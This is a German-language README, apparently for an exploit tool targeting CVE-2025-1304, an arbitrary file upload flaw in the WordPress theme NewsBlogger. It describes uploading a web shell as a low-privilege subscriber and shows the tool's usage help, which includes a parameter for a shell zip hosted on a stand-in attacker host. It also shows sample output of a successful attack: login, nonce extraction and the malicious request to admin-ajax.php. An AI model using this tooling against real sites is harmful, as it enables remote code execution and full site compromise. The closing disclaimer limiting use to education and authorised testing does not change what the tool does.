
Das WordPress-Theme NewsBlogger <= 0.2.5.1 ist anfällig für beliebigen Datei-Upload.
CVSS-Wert: 8.8 (Hoch)
Schwachstellentyp: Beliebiger Datei-Upload
Komponente: WordPress-Theme
CVE-ID: CVE-2025-1304
Das WordPress-Theme NewsBlogger (Versionen <= 0.2.5.1) ist über das Admin-Willkommenspanel von einer Schwachstelle vom Typ Beliebiger Datei-Upload betroffen.
Diese Schwachstelle erlaubt es jedem authentifizierten Benutzer – einschließlich solcher mit der minimalen Abonnent-Rolle – ein bösartiges .zip-Archiv hochzuladen, das eine Webshell enthält.
Der Upload erfolgt über ein nicht validiertes Plugin-URL-Feld, das den Inhalt oder Typ der hochgeladenen Datei nicht ordnungsgemäß überprüft.
Ein erfolgreicher Angriff kann zur vollständigen Kompromittierung der Website führen, einschließlich Remotecodeausführung und Privilegieneskalation.
Dieses Python-Skript automatisiert die Ausnutzung der Schwachstelle, indem es:
nonce dynamisch aus der verwundbaren Begrüßungsseite extrahiert.python CVE-2025-1304.py -h
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
--url, -u URL Target base URL (e.g., http://target/wordpress)
--username, -un USERNAME WordPress admin username
--password, -p PASSWORD WordPress admin password
--shellweb, -shell SHELLWEB
Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
Dieser Code wird ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt.
Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
By: Nxploited ( Khaled Alenazi )